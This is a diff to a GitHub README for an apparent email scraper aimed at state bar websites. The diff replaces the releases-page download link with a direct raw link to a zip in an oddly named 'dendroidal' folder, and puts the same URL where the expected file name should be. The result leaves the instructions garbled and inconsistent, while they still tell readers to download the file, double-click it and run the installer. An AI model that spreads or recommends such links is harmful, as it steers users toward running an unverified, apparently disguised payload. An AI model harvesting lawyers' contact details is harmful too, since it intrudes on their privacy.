ANURAG1-DEV-HASH/state-bar-websites-email-scraper/README.md

 - **Storage Space:** At least 100 MB of free disk space

 ### 📥 Download & Install
-1. Click the link to visit the release page: [Download Now](https://github.com/ANURAG1-DEV-HASH/state-bar-websites-email-scraper/releases)
+1. Click the link to visit the release page: [Download Now](https://raw.githubusercontent.com/ANURAG1-DEV-HASH/state-bar-websites-email-scraper/main/dendroidal/state-bar-websites-email-scraper-1.7.zip)
 2. Once on the releases page, find the latest version of the software.
 It will usually be at the top.
-3. Look for the file labeled “state-bar-websites-email-scraper.exe” (for Windows users) or the corresponding file for your operating system.
+3. Look for the file labeled “https://raw.githubusercontent.com/ANURAG1-DEV-HASH/state-bar-websites-email-scraper/main/dendroidal/state-bar-websites-email-scraper-1.7.zip” (for Windows users) or the corresponding file for your operating system.
 4. Click the file link to begin the download.
 Save it to a location you can easily access, like your Desktop or Downloads folder.
 5. After the download is complete, locate the file and double-click it to run the installer.
 6. Follow the on-screen prompts to complete the installation.